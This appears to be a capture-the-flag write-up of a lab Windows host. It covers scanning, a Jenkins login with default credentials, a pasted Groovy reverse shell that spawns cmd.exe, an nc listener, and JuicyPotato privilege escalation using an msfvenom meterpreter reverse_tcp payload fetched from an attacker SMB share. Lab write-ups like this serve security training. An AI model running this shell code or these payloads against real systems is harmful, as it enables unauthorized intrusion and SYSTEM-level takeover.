Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Scanning
nmap
root@ip-10-10-77-178:~# nmap -A -T4 -O 10.10.126.34
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-21 16:30 BST
Nmap scan report for ip-10-10-126-34.eu-west-1.compute.internal (10.10.126.34)
Host is up (0.00046s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2021-09-20T15:27:46
|_Not valid after: 2022-03-22T15:27:46
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 02:1A:CA:11:02:A3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms ip-10-10-126-34.eu-west-1.compute.internal (10.10.126.34)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds
3 Ports open
Enumeration
Port 80
landing page after some enum no thing interesting except this mail alfred@wayneenterprises.com
Port 8080
Jenkins login page ... after some tries of default credentials admin:admin
Now we should find a way to execute reverse shell jenkins has this ability just copy me
Initial Access
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
setup listener on attacker box nc -nlvvp 8044
run payload ...
Privilege Escalation
we will use JuicyPotato
setup smb server on attacker box smbserver.py kali .
Download on victim machine C:\Users\bruce\Desktop>copy \10.10.77.178\kali\JuicyPotato.exe JuicyPotato.exe
we need to generate msf payload to gain reverse shell with system privilege
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o rev1234.exe
copy it to victim box in same way above
then setup handler for the above payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.77.178
set LPORT 1234 run
run C:\Users\bruce\Desktop>JuicyPotato.exe -t * -l 1234 -p C:\Users\bruce\Desktop\rev1234.exe
